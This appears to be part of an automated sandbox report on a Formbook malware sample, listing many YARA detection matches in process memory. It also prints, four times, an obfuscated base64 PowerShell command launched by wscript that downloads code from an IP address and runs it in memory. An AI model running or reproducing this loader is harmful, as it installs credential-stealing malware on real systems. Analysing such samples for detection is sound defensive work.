          Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
          Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
          Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
          Source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
          Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
          Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
          Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.608771918.000002823988E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.609935000.00000282490C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000015.00000002.605217866.0000028239656000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
          Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
